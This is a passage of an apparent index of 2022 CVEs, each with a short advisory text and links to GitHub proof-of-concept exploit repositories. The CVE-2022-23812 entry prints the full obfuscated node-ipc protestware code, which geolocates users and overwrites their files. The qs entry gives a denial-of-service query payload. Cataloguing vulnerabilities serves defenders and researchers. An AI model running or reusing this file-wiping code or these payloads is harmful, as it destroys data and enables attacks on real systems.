privilege escalation ,which can impact on some webOS TV models. + + +- [DavidBuchanan314/WAMpage](https://github.com/DavidBuchanan314/WAMpage) + +### CVE-2022-23773 (2022-02-11) + +cmd/go in Go before 1.16.14 and 1.17.x before 1.17.7 can misinterpret branch names that falsely appear to be version tags. This can lead to incorrect access control if an actor is supposed to be able to create branches but not tags. + + +- [danbudris/CVE-2022-23773-repro](https://github.com/danbudris/CVE-2022-23773-repro) +- [danbudris/CVE-2022-23773-repro-target](https://github.com/danbudris/CVE-2022-23773-repro-target) +- [YouShengLiu/CVE-2022-23773-Reproduce](https://github.com/YouShengLiu/CVE-2022-23773-Reproduce) + +### CVE-2022-23779 (2022-03-02) + +Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses. + + +- [fbusr/CVE-2022-23779](https://github.com/fbusr/CVE-2022-23779) +- [Vulnmachines/Zoho_CVE-2022-23779](https://github.com/Vulnmachines/Zoho_CVE-2022-23779) + +### CVE-2022-23808 (2022-01-22) + +An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection. + + +- [dipakpanchal05/CVE-2022-23808](https://github.com/dipakpanchal05/CVE-2022-23808) + +### CVE-2022-23812 (2022-03-16) + +This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl }; + + +- [scriptzteam/node-ipc-malware-protestware-CVE-2022-23812](https://github.com/scriptzteam/node-ipc-malware-protestware-CVE-2022-23812) + +### CVE-2022-23852 (2022-01-24) + +Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with a nonzero XML_CONTEXT_BYTES. + + +- [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23852](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23852) + +### CVE-2022-23861 (2024-10-22) + +Multiple Stored Cross-Site Scripting vulnerabilities were discovered in Y Soft SAFEQ 6 Build 53. Multiple fields in the YSoft SafeQ web application can be used to inject malicious inputs that, due to a lack of output sanitization, result in the execution of arbitrary JS code. These fields can be leveraged to perform XSS attacks on legitimate users accessing the SafeQ web interface. + + +- [mbadanoiu/CVE-2022-23861](https://github.com/mbadanoiu/CVE-2022-23861) + +### CVE-2022-23862 (2024-10-22) + +A Local Privilege Escalation issue was discovered in Y Soft SAFEQ 6 Build 53. The SafeQ JMX service running on port 9696 is vulnerable to JMX MLet attacks. Because the service did not enforce authentication and was running under the "NT Authority\System" user, an attacker is able to use the vulnerability to execute arbitrary code and elevate to the system user. + + +- [mbadanoiu/CVE-2022-23862](https://github.com/mbadanoiu/CVE-2022-23862) + +### CVE-2022-23884 (2022-03-28) + +Mojang Bedrock Dedicated Server 1.18.2 is affected by an integer overflow leading to a bound check bypass caused by PurchaseReceiptPacket::_read (packet deserializer). + + +- [nanaao/CVE-2022-23884](https://github.com/nanaao/CVE-2022-23884) + +### CVE-2022-23909 (2022-04-05) + +There is an unquoted service path in Sherpa Connector Service (SherpaConnectorService.exe) 2020.2.20328.2050. This might allow a local user to escalate privileges by creating a "C:\Program Files\Sherpa Software\Sherpa.exe" file. + + +- [netsectuna/CVE-2022-23909](https://github.com/netsectuna/CVE-2022-23909) + +### CVE-2022-23935 (2022-01-25) + +lib/Image/ExifTool.pm in ExifTool before 12.38 mishandles a $file =~ /\|$/ check, leading to command injection. + + +- [dpbe32/CVE-2022-23935-PoC-Exploit](https://github.com/dpbe32/CVE-2022-23935-PoC-Exploit) +- [cowsecurity/CVE-2022-23935](https://github.com/cowsecurity/CVE-2022-23935) +- [BKreisel/CVE-2022-23935](https://github.com/BKreisel/CVE-2022-23935) + +### CVE-2022-23940 (2022-03-07) + +SuiteCRM through 7.12.1 and 8.x through 8.0.1 allows Remote Code Execution. Authenticated users with access to the Scheduled Reports module can achieve this by leveraging PHP deserialization in the email_recipients property. By using a crafted request, they can create a malicious report, containing a PHP-deserialization payload in the email_recipients field. Once someone accesses this report, the backend will deserialize the content of the email_recipients field and the payload gets executed. Project dependencies include a number of interesting PHP deserialization gadgets (e.g., Monolog/RCE1 from phpggc) that can be used for Code Execution. + + +- [manuelz120/CVE-2022-23940](https://github.com/manuelz120/CVE-2022-23940) + +### CVE-2022-23967 +- [MaherAzzouzi/CVE-2022-23967](https://github.com/MaherAzzouzi/CVE-2022-23967) + +### CVE-2022-23988 (2022-02-28) + +The WS Form LITE and Pro WordPress plugins before 1.8.176 do not sanitise and escape submitted form data, allowing unauthenticated attacker to submit XSS payloads which will get executed when a privileged user will view the related submission + + +- [simonepetruzzi/WebSecurityProject](https://github.com/simonepetruzzi/WebSecurityProject) + +### CVE-2022-23990 (2022-01-26) + +Expat (aka libexpat) before 2.4.4 has an integer overflow in the doProlog function. + + +- [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23990](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23990) + +### CVE-2022-24086 (2022-02-16) + +Adobe Commerce versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier) are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrary code execution. + + +- [Mr-xn/CVE-2022-24086](https://github.com/Mr-xn/CVE-2022-24086) +- [nanaao/CVE-2022-24086-RCE](https://github.com/nanaao/CVE-2022-24086-RCE) +- [NHPT/CVE-2022-24086-RCE](https://github.com/NHPT/CVE-2022-24086-RCE) +- [oK0mo/CVE-2022-24086-RCE-PoC](https://github.com/oK0mo/CVE-2022-24086-RCE-PoC) +- [seymanurmutlu/CVE-2022-24086-CVE-2022-24087](https://github.com/seymanurmutlu/CVE-2022-24086-CVE-2022-24087) +- [akr3ch/CVE-2022-24086](https://github.com/akr3ch/CVE-2022-24086) +- [pescepilota/CVE-2022-24086](https://github.com/pescepilota/CVE-2022-24086) +- [BurpRoot/CVE-2022-24086](https://github.com/BurpRoot/CVE-2022-24086) +- [wubinworks/magento2-template-filter-patch](https://github.com/wubinworks/magento2-template-filter-patch) + +### CVE-2022-24087 +- [Neimar47574/CVE-2022-24087](https://github.com/Neimar47574/CVE-2022-24087) + +### CVE-2022-24112 (2022-02-11) + +An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + + +- [Mr-xn/CVE-2022-24112](https://github.com/Mr-xn/CVE-2022-24112) +- [CrackerCat/CVE-2022-24112](https://github.com/CrackerCat/CVE-2022-24112) +- [Axx8/CVE-2022-24112](https://github.com/Axx8/CVE-2022-24112) +- [Mah1ndra/CVE-2022-24112](https://github.com/Mah1ndra/CVE-2022-24112) +- [M4xSec/Apache-APISIX-CVE-2022-24112](https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112) +- [kavishkagihan/CVE-2022-24112-POC](https://github.com/kavishkagihan/CVE-2022-24112-POC) +- [twseptian/cve-2022-24112](https://github.com/twseptian/cve-2022-24112) +- [Acczdy/CVE-2022-24112_POC](https://github.com/Acczdy/CVE-2022-24112_POC) +- [btar1gan/exploit_CVE-2022-24112](https://github.com/btar1gan/exploit_CVE-2022-24112) + +### CVE-2022-24122 (2022-01-29) + +kernel/ucount.c in the Linux kernel 5.14 through 5.16.4, when unprivileged user namespaces are enabled, allows a use-after-free and privilege escalation because a ucounts object can outlive its namespace. + + +- [meowmeowxw/CVE-2022-24122](https://github.com/meowmeowxw/CVE-2022-24122) + +### CVE-2022-24124 (2022-01-29) + +The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations. + + +- [ColdFusionX/CVE-2022-24124](https://github.com/ColdFusionX/CVE-2022-24124) +- [0xAbbarhSF/CVE-2022-24124](https://github.com/0xAbbarhSF/CVE-2022-24124) +- [b1gdog/CVE-2022-24124](https://github.com/b1gdog/CVE-2022-24124) + +### CVE-2022-24125 (2022-03-20) + +The matchmaking servers of Bandai Namco FromSoftware Dark Souls III through 2022-03-19 allow remote attackers to send arbitrary push requests to clients via a RequestSendMessageToPlayers request. For example, ability to send a push message to hundreds of thousands of machines is only restricted on the client side, and can thus be bypassed with a modified client. + + +- [tremwil/ds3-nrssr-rce](https://github.com/tremwil/ds3-nrssr-rce) + +### CVE-2022-24181 (2022-04-01) + +Cross-site scripting (XSS) via Host Header injection in PKP Open Journals System 2.4.8 >= 3.3 allows remote attackers to inject arbitary code via the X-Forwarded-Host Header. + + +- [cyberhawk000/CVE-2022-24181](https://github.com/cyberhawk000/CVE-2022-24181) + +### CVE-2022-24227 (2022-02-15) + +A cross-site scripting (XSS) vulnerability in BoltWire v7.10 and v 8.00 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the name and lastname parameters. + + +- [Cyber-Wo0dy/CVE-2022-24227-updated](https://github.com/Cyber-Wo0dy/CVE-2022-24227-updated) + +### CVE-2022-24342 (2022-02-25) + +In JetBrains TeamCity before 2021.2.1, URL injection leading to CSRF was possible. + + +- [yuriisanin/CVE-2022-24342](https://github.com/yuriisanin/CVE-2022-24342) + +### CVE-2022-24348 (2022-02-04) + +Argo CD before 2.1.9 and 2.2.x before 2.2.4 allows directory traversal related to Helm charts because of an error in helmTemplate in repository.go. For example, an attacker may be able to discover credentials stored in a YAML file. + + +- [jkroepke/CVE-2022-24348-2](https://github.com/jkroepke/CVE-2022-24348-2) + +### CVE-2022-24439 (2022-12-12) + +All versions of package gitpython are vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments. + + +- [muhammadhendro/CVE-2022-24439](https://github.com/muhammadhendro/CVE-2022-24439) + +### CVE-2022-24442 (2022-02-25) + +JetBrains YouTrack before 2021.4.40426 was vulnerable to SSTI (Server-Side Template Injection) via FreeMarker templates. + + +- [mbadanoiu/CVE-2022-24442](https://github.com/mbadanoiu/CVE-2022-24442) + +### CVE-2022-24449 (2022-04-28) + +Solar appScreener through 3.10.4, when a valid license is not present, allows XXE and SSRF attacks via a crafted XML document. + + +- [jet-pentest/CVE-2022-24449](https://github.com/jet-pentest/CVE-2022-24449) + +### CVE-2022-24481 (2022-04-15) + +Windows Common Log File System Driver Elevation of Privilege Vulnerability + + +- [fr4nkxixi/CVE-2022-24481-POC](https://github.com/fr4nkxixi/CVE-2022-24481-POC) + +### CVE-2022-24483 (2022-04-15) + +Windows Kernel Information Disclosure Vulnerability + + +- [waleedassar/CVE-2022-24483](https://github.com/waleedassar/CVE-2022-24483) + +### CVE-2022-24491 (2022-04-15) + +Windows Network File System Remote Code Execution Vulnerability + + +- [corelight/CVE-2022-24491](https://github.com/corelight/CVE-2022-24491) + +### CVE-2022-24494 (2022-04-15) + +Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability + + +- [vportal/AFD](https://github.com/vportal/AFD) + +### CVE-2022-24497 (2022-04-15) + +Windows Network File System Remote Code Execution Vulnerability + + +- [corelight/CVE-2022-24497](https://github.com/corelight/CVE-2022-24497) + +### CVE-2022-24500 (2022-04-15) + +Windows SMB Remote Code Execution Vulnerability + + +- [0xZipp0/CVE-2022-24500](https://github.com/0xZipp0/CVE-2022-24500) + +### CVE-2022-24611 (2022-05-17) + +Denial of Service (DoS) in the Z-Wave S0 NonceGet protocol specification in Silicon Labs Z-Wave 500 series allows local attackers to block S0/S2 protected Z-Wave network via crafted S0 NonceGet Z-Wave packages, utilizing included but absent NodeIDs. + + +- [ITSecLab-HSEL/CVE-2022-24611](https://github.com/ITSecLab-HSEL/CVE-2022-24611) + +### CVE-2022-24637 (2022-03-18) + +Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter. + + +- [JacobEbben/CVE-2022-24637](https://github.com/JacobEbben/CVE-2022-24637) +- [Lay0us/CVE-2022-24637](https://github.com/Lay0us/CVE-2022-24637) +- [hupe1980/CVE-2022-24637](https://github.com/hupe1980/CVE-2022-24637) +- [icebreack/CVE-2022-24637](https://github.com/icebreack/CVE-2022-24637) +- [Pflegusch/CVE-2022-24637](https://github.com/Pflegusch/CVE-2022-24637) +- [0xM4hm0ud/CVE-2022-24637](https://github.com/0xM4hm0ud/CVE-2022-24637) +- [0xRyuk/CVE-2022-24637](https://github.com/0xRyuk/CVE-2022-24637) + +### CVE-2022-24644 (2022-03-07) + +ZZ Inc. KeyMouse Windows 3.08 and prior is affected by a remote code execution vulnerability during an unauthenticated update. To exploit this vulnerability, a user must trigger an update of an affected installation of KeyMouse. + + +- [gerr-re/cve-2022-24644](https://github.com/gerr-re/cve-2022-24644) +- [ThanhThuy2908/ATHDH_CVE_2022_24644](https://github.com/ThanhThuy2908/ATHDH_CVE_2022_24644) + +### CVE-2022-24654 (2022-08-15) + +Authenticated stored cross-site scripting (XSS) vulnerability in "Field Server Address" field in INTELBRAS ATA 200 Firmware 74.19.10.21 allows attackers to inject JavaScript code through a crafted payload. + + +- [leonardobg/CVE-2022-24654](https://github.com/leonardobg/CVE-2022-24654) + +### CVE-2022-24675 (2022-04-20) + +encoding/pem in Go before 1.17.9 and 1.18.x before 1.18.1 has a Decode stack overflow via a large amount of PEM data. + + +- [jfrog/jfrog-CVE-2022-24675](https://github.com/jfrog/jfrog-CVE-2022-24675) + +### CVE-2022-24693 (2022-03-30) + +Baicells Nova436Q and Neutrino 430 devices with firmware through QRTB 2.7.8 have hardcoded credentials that are easily discovered, and can be used by remote attackers to authenticate via ssh. (The credentials are stored in the firmware, encrypted by the crypt function.) + + +- [lukejenkins/CVE-2022-24693](https://github.com/lukejenkins/CVE-2022-24693) + +### CVE-2022-24702 (2022-05-31) + +An issue was discovered in WinAPRS 2.9.0. A buffer overflow in the VHF KISS TNC component allows a remote attacker to achieve remote code execution via malicious AX.25 packets over the air. NOTE: This vulnerability only affects products that are no longer supported by the maintainer + + +- [Coalfire-Research/WinAPRS-Exploits](https://github.com/Coalfire-Research/WinAPRS-Exploits) + +### CVE-2022-24706 (2022-04-26) + +In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. The CouchDB documentation has always made recommendations for properly securing an installation, including recommending using a firewall in front of all CouchDB installations. + + +- [sadshade/CVE-2022-24706-CouchDB-Exploit](https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit) +- [ahmetsabrimert/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-](https://github.com/ahmetsabrimert/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-) +- [superzerosec/CVE-2022-24706](https://github.com/superzerosec/CVE-2022-24706) + +### CVE-2022-24707 (2022-02-23) + +Anuko Time Tracker is an open source, web-based time tracking application written in PHP. UNION SQL injection and time-based blind injection vulnerabilities existed in Time Tracker Puncher plugin in versions of anuko timetracker prior to 1.20.0.5642. This was happening because the Puncher plugin was reusing code from other places and was relying on an unsanitized date parameter in POST requests. Because the parameter was not checked, it was possible to craft POST requests with malicious SQL for Time Tracker database. This issue has been resolved in in version 1.20.0.5642. Users unable to upgrade are advised to add their own checks to input. + + +- [Altelus1/CVE-2022-24707](https://github.com/Altelus1/CVE-2022-24707) + +### CVE-2022-24713 (2022-03-08) + +regex is an implementation of regular expressions for the Rust language. The regex crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API. Unfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes. All versions of the regex crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from regex 1.5.5. All users accepting user-controlled regexes are recommended to upgrade immediately to the latest version of the regex crate. Unfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, it us not recommend to deny known problematic regexes. + + +- [ItzSwirlz/CVE-2022-24713-POC](https://github.com/ItzSwirlz/CVE-2022-24713-POC) + +### CVE-2022-24715 (2022-03-08) + +Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Authenticated users, with access to the configuration, can create SSH resource files in unintended directories, leading to the execution of arbitrary code. This issue has been resolved in versions 2.8.6, 2.9.6 and 2.10 of Icinga Web 2. Users unable to upgrade should limit access to the Icinga Web 2 configuration. + + +- [JacobEbben/CVE-2022-24715](https://github.com/JacobEbben/CVE-2022-24715) +- [cxdxnt/CVE-2022-24715](https://github.com/cxdxnt/CVE-2022-24715) +- [d4rkb0n3/CVE-2022-24715-go](https://github.com/d4rkb0n3/CVE-2022-24715-go) + +### CVE-2022-24716 (2022-03-08) + +Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials. This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated. + + +- [JacobEbben/CVE-2022-24716](https://github.com/JacobEbben/CVE-2022-24716) +- [joaoviictorti/CVE-2022-24716](https://github.com/joaoviictorti/CVE-2022-24716) +- [pumpkinpiteam/CVE-2022-24716](https://github.com/pumpkinpiteam/CVE-2022-24716) +- [doosec101/CVE-2022-24716](https://github.com/doosec101/CVE-2022-24716) +- [antisecc/CVE-2022-24716](https://github.com/antisecc/CVE-2022-24716) + +### CVE-2022-24734 (2022-03-09) + +MyBB is a free and open source forum software. In affected versions the Admin CP's Settings management module does not validate setting types correctly on insertion and update, making it possible to add settings of supported type `php` with PHP code, executed on on _Change Settings_ pages. This results in a Remote Code Execution (RCE) vulnerability. The vulnerable module requires Admin CP access with the `Can manage settings?` permission. MyBB's Settings module, which allows administrators to add, edit, and delete non-default settings, stores setting data in an options code string ($options_code; mybb_settings.optionscode database column) that identifies the setting type and its options, separated by a new line character (\n). In MyBB 1.2.0, support for setting type php was added, for which the remaining part of the options code is PHP code executed on Change Settings pages (reserved for plugins and internal use). MyBB 1.8.30 resolves this issue. There are no known workarounds. + + +- [Altelus1/CVE-2022-24734](https://github.com/Altelus1/CVE-2022-24734) +- [lavclash75/mybb-CVE-2022-24734](https://github.com/lavclash75/mybb-CVE-2022-24734) + +### CVE-2022-24760 (2022-03-11) + +Parse Server is an open source http web server backend. In versions prior to 4.10.7 there is a Remote Code Execution (RCE) vulnerability in Parse Server. This vulnerability affects Parse Server in the default configuration with MongoDB. The main weakness that leads to RCE is the Prototype Pollution vulnerable code in the file `DatabaseController.js`, so it is likely to affect Postgres and any other database backend as well. This vulnerability has been confirmed on Linux (Ubuntu) and Windows. Users are advised to upgrade as soon as possible. The only known workaround is to manually patch your installation with code referenced at the source GHSA-p6h4-93qp-jhcm. + + +- [tuo4n8/CVE-2022-24760](https://github.com/tuo4n8/CVE-2022-24760) + +### CVE-2022-24780 (2022-04-05) + +Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, users of the iTop user portal can send TWIG code to the server by forging specific http queries, and execute arbitrary code on the server using http server user privileges. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds. + + +- [Acceis/exploit-CVE-2022-24780](https://github.com/Acceis/exploit-CVE-2022-24780) + +### CVE-2022-24818 (2022-04-13) + +GeoTools is an open source Java library that provides tools for geospatial data. The GeoTools library has a number of data sources that can perform unchecked JNDI lookups, which in turn can be used to perform class deserialization and result in arbitrary code execution. Similar to the Log4J case, the vulnerability can be triggered if the JNDI names are user-provided, but requires admin-level login to be triggered. The lookups are now restricted in GeoTools 26.4, GeoTools 25.6, and GeoTools 24.6. Users unable to upgrade should ensure that any downstream application should not allow usage of remotely provided JNDI strings. + + +- [mbadanoiu/CVE-2022-24818](https://github.com/mbadanoiu/CVE-2022-24818) + +### CVE-2022-24834 (2023-07-13) + +Redis is an in-memory database that persists on disk. A specially crafted Lua script executing in Redis can trigger a heap overflow in the cjson library, and result with heap corruption and potentially remote code execution. The problem exists in all versions of Redis with Lua scripting support, starting from 2.6, and affects only authenticated and authorized users. The problem is fixed in versions 7.0.12, 6.2.13, and 6.0.20. + + +- [convisolabs/CVE-2022-24834](https://github.com/convisolabs/CVE-2022-24834) +- [DukeSec97/CVE-2022-24834-](https://github.com/DukeSec97/CVE-2022-24834-) + +### CVE-2022-24853 (2022-04-14) + +Metabase is an open source business intelligence and analytics application. Metabase has a proxy to load arbitrary URLs for JSON maps as part of our GeoJSON support. While we do validation to not return contents of arbitrary URLs, there is a case where a particularly crafted request could result in file access on windows, which allows enabling an `NTLM relay attack`, potentially allowing an attacker to receive the system password hash. If you use Windows and are on this version of Metabase, please upgrade immediately. The following patches (or greater versions) are available: 0.42.4 and 1.42.4, 0.41.7 and 1.41.7, 0.40.8 and 1.40.8. + + +- [secure-77/CVE-2022-24853](https://github.com/secure-77/CVE-2022-24853) + +### CVE-2022-24924 (2022-02-11) + +An improper access control in LiveWallpaperService prior to versions 3.0.9.0 allows to create a specific named system directory without a proper permission. + + +- [heegong/CVE-2022-24924](https://github.com/heegong/CVE-2022-24924) + +### CVE-2022-24934 (2022-03-23) + +wpsupdater.exe in Kingsoft WPS Office through 11.2.0.10382 allows remote code execution by modifying HKEY_CURRENT_USER in the registry. + + +- [nanaao/CVE-2022-24934](https://github.com/nanaao/CVE-2022-24934) +- [ASkyeye/WPS-CVE-2022-24934](https://github.com/ASkyeye/WPS-CVE-2022-24934) +- [webraybtl/CVE-2022-24934](https://github.com/webraybtl/CVE-2022-24934) +- [MagicPiperSec/WPS-CVE-2022-24934](https://github.com/MagicPiperSec/WPS-CVE-2022-24934) + +### CVE-2022-24990 (2023-02-07) + +TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending "User-Agent: TNAS" to module/api.php?mobile/webNasIPS and then reading the PWD field in the response. + + +- [Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP-](https://github.com/Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP-) +- [VVeakee/CVE-2022-24990-POC](https://github.com/VVeakee/CVE-2022-24990-POC) +- [0xf4n9x/CVE-2022-24990](https://github.com/0xf4n9x/CVE-2022-24990) +- [lishang520/CVE-2022-24990](https://github.com/lishang520/CVE-2022-24990) +- [ZZ-SOCMAP/CVE-2022-24990](https://github.com/ZZ-SOCMAP/CVE-2022-24990) +- [jsongmax/terraMaster-CVE-2022-24990](https://github.com/jsongmax/terraMaster-CVE-2022-24990) + +### CVE-2022-24992 (2022-07-25) + +A vulnerability in the component process.php of QR Code Generator v5.2.7 allows attackers to perform directory traversal. + + +- [n0lsecurity/CVE-2022-24992](https://github.com/n0lsecurity/CVE-2022-24992) + +### CVE-2022-24999 (2022-11-26) + +qs before 6.10.3, as used in Express before 4.17.3 and other products, allows attackers to cause a Node process hang for an Express application because an __ proto__ key can be used. In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as a[__proto__]=b&a[__proto__]&a[length]=100000000. The fix was backported to qs 6.9.7, 6.8.3, 6.7.3, 6.6.1, 6.5.3, 6.4.1, 6.3.3, and 6.2.4 (and therefore Express 4.17.3, which has "deps: qs@6.9.7" in its release description, is not vulnerable). + + +- [n8tz/CVE-2022-24999](https://github.com/n8tz/CVE-2022-24999) + +### CVE-2022-25012 (2022-03-01) + +Argus Surveillance DVR v4.0 employs weak password encryption. + + +- [s3l33/CVE-2022-25012](https://github.com/s3l33/CVE-2022-25012) + +### CVE-2022-25018 (2022-03-01) + +Pluxml v5.8.7 was discovered to allow attackers to execute arbitrary code via crafted PHP code inserted into static pages. + + +- [MoritzHuppert/CVE-2022-25018](https://github.com/MoritzHuppert/CVE-2022-25018) + +### CVE-2022-25020 (2022-03-01) + +A cross-site scripting (XSS) vulnerability in Pluxml v5.8.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the thumbnail path of a blog post. + + +- [MoritzHuppert/CVE-2022-25020](https://github.com/MoritzHuppert/CVE-2022-25020) + +### CVE-2022-25022 (2022-03-01) + +A cross-site scripting (XSS) vulnerability in Htmly v2.8.1 allows attackers to excute arbitrary web scripts HTML via a crafted payload in the content field of a blog post. + + +- [MoritzHuppert/CVE-2022-25022](https://github.com/MoritzHuppert/CVE-2022-25022) + +### CVE-2022-25060 (2022-02-25) + +TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a command injection vulnerability via the component oal_startPing. + + +- [exploitwritter/CVE-2022-25060](https://github.com/exploitwritter/CVE-2022-25060) + +### CVE-2022-25061 (2022-02-25) + +TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a command injection vulnerability via the component oal_setIp6DefaultRoute. + + +- [exploitwritter/CVE-2022-25061](https://github.com/exploitwritter/CVE-2022-25061) + +### CVE-2022-25062 (2022-02-25) + +TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain an integer overflow via the function dm_checkString. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. + + +- [exploitwritter/CVE-2022-25062](https://github.com/exploitwritter/CVE-2022-25062) + +### CVE-2022-25063 +- [exploitwritter/CVE-2022-25063](https://github.com/exploitwritter/CVE-2022-25063) + +### CVE-2022-25064 (2022-02-25) + +TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a remote code execution (RCE) vulnerability via the function oal_wan6_setIpAddr. + + +- [exploitwritter/CVE-2022-25064](https://github.com/exploitwritter/CVE-2022-25064) +- [Mr-xn/CVE-2022-25064](https://github.com/Mr-xn/CVE-2022-25064) + +### CVE-2022-25089 (2022-03-02) + +Printix Secure Cloud Print Management through 1.3.1106.0 incorrectly uses Privileged APIs to modify values in HKEY_LOCAL_MACHINE via UITasks.PersistentRegistryData. + + +- [ComparedArray/printix-CVE-2022-25089](https://github.com/ComparedArray/printix-CVE-2022-25089) + +### CVE-2022-25090 (2022-03-09) + +Printix Secure Cloud Print Management through 1.3.1106.0 creates a temporary temp.ini file in a directory with insecure permissions, leading to privilege escalation because of a race condition. + + +- [ComparedArray/printix-CVE-2022-25090](https://github.com/ComparedArray/printix-CVE-2022-25090) + +### CVE-2022-25235 (2022-02-16) + +xmltok_impl.c in Expat (aka libexpat) before 2.4.5 lacks certain validation of encoding, such as checks for whether a UTF-8 character is valid in a certain context. + + +- [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25235](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25235) + +### CVE-2022-25236 (2022-02-16) + +xmlparse.c in Expat (aka libexpat) before 2.4.5 allows attackers to insert namespace-separator characters into namespace URIs. + + +- [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25236](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25236) + +### CVE-2022-25256 (2022-02-19) + +SAS Web Report Studio 4.4 allows XSS. /SASWebReportStudio/logonAndRender.do has two parameters: saspfs_request_backlabel_list and saspfs_request_backurl_list. The first one affects the content of the button placed in the top left. The second affects the page to which the user is directed after pressing the button, e.g., a malicious web page. In addition, the second parameter executes JavaScript, which means XSS is possible by adding a javascript: URL. + + +- [RobertDra/CVE-2022-25256](https://github.com/RobertDra/CVE-2022-25256) + +### CVE-2022-25257 +- [polling-repo-continua/CVE-2022-25257](https://github.com/polling-repo-continua/CVE-2022-25257) +- [RobertDra/CVE-2022-25257](https://github.com/RobertDra/CVE-2022-25257) + +### CVE-2022-25258 (2022-02-16) + +An issue was discovered in drivers/usb/gadget/composite.c in the 